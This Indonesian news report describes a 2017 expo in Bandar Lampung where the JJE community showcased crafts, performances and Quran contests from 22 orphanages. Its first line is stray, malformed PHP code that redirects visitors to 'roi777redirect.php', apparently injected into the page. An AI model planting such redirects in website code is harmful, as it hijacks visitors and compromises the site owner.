header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); JJE Eksplor Kreatifitas Anak -
JJE Eksplor Kreatifitas Anak

TRANSLAMPUNG.COM-EDUKASI-Jalan-jalan edukasi (JJE) melakukan Expo panti 2017 di graha Mandala, kemarin(19/2). Acara yang diselenggarakan dari pukul 10.00WIB tersebut dihadiri oleh Ustad suratno pembina JJE Lampung, Novan ketua JJE, putri Lampung Feriska, dihadiri juga 22 panti asuhan di Bandarlampung.

Acara ini ada 22 stand dari berbagai panti asuhan di sekitar Bandar Lampung, dengan setiap standnya dibimbing oleh komunitas diluar JJE, 33stand reguler, dan 500 anak panti asuhan.

Qonita Hikmala Fatma mengatakan, tujuan dari acara ini yang pertama sebagai perayaan ulang tahun JJE sendiri yang , dan dapat mengesplor kreatifitas adik-adik panti, dan agar masyarakat lebih dekat, dan peduli dengan adik-adik panti.

Acara yang berjalan begitu meriah, dengan berbagai pertunjukan musikalisasi, marawis, dari perwakilan panti, drama musical dari anggota JJE, stand up comedy yang ditampilkan oleh Newendi Septian, Fico Fachrizi tersebut telah dipersiapkan pihak JJE selam 6 bulan, dan 3bulan untuk kamatangan acaranya.

Acara ini, merupakan acara yang terbesar, diantara acara yang selama dua tahun ini kita lakukan, jika ditahun kemari kami menyambut ulah tahun JJE di Tabek indah, dengan menyelenggrakan dulunya outbond, yang bertujuan melatih jiwa kepemimpinan. Sekarang dengan acara yang kami selenggarakan ini, kami berharap agar anak-anak panti dapat mengekpoitas kreatifitas mereka, dan dapat dikenal oleh masyarakat, terutama dari kreatifitas mereka.

Berbagai lomba juga digelar dalam acara ini, ada lomba tilawah, tafis quran juz 30, untuk ktegori SD- SMA, dengan 3 finalis SD, dan 5finalis SMA/SMP yang dalam kegiatannya bekerjasama dengan Darul Quran, dan pemilihan Stand terbaik, yang voting favorit pengunjung, banyak nya hastage Instagram @exspo panti2017, dan keunikan karya dari setiap stand, dengan sstem penilaian panitia, dengan keunikan karya tersebut, tidak mengeluarkan budget yang banyak.

Sehungga hal tersebut memicu semangat anak-anak panti untuk lebih kreatif, dengan memberikan kreatifitas terbaik mereka di setiap standnya, seperti kardus didaur ulang untuk menghasilkan bentuk robot, kertas biola yang dibut menjadi bunga, daun pelepah pisang yang sama anak-anak panti dapat mengasilkan kreatifitas kaligrafi.

Sementara itu, berbagai stand regular banyak memebrikan jamuan kepada pengunjungnya seperti aneka jenis makanan, jilbab, kosmetik, bahkan terdapat stand dari klinik, sehingga pengunjung dapat sekalian cek kesehatan ditempat teyrsebut.

Salah satu panitia peserta, sekaligus Pembina salah satu panti Muhammad Iqmal Zain mengatakan, kreatifitas yang ditampilkan anak-anak panti telah dipersipakannya selama tujuh hari, dan nanti hasil dari penjualannya, juga untuk panti asuhan, dan apabila uang tersebut lebih, tetap untuk anak-anak panti, seperti untuk jajan mereka.(tnn)

News Reporter